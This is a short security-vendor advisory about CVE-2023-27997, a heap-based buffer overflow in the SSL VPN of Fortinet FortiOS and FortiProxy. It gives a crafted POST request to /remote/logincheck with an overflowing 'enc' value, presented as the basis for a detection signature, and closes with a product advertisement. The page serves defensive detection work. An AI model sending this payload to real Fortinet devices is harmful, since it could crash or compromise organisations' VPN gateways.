top of page

Fortinet 7.2.4 - Heap Based Buffer Overflow (CVE-2023-27997)






Applicance Details

FortiProxy is a web gateway used to provide multiple detection techniques against internet based attacks.

FortiOS is an operating system utilised to deploy and enforce security policies, and enable centralized management across the entire distributed network.


Vulnerability

Fortinet FortiProxy and FortiOS are vulnerable to a heap-based buffer overflow, caused by improper bounds checking by the SSL VPN function.


Identification

By sending specially crafted requests, a remote attacker could overflow a buffer and execute arbitrary code on the system.


POST /remote/logincheck HTTP/1.1

PAYLOAD - ajax=1&username=test&realm=&credential=&enc=000000247255fc38aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Detection

By turning this into a traffic file and matching rule, we are able to detect unauthenticated attempts to overflow a buffer and execute arbitrary code on the system.


Coverage

Idappcom has created signature 8023945 along with a corresponding traffic file.


References


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional

Comentários


bottom of page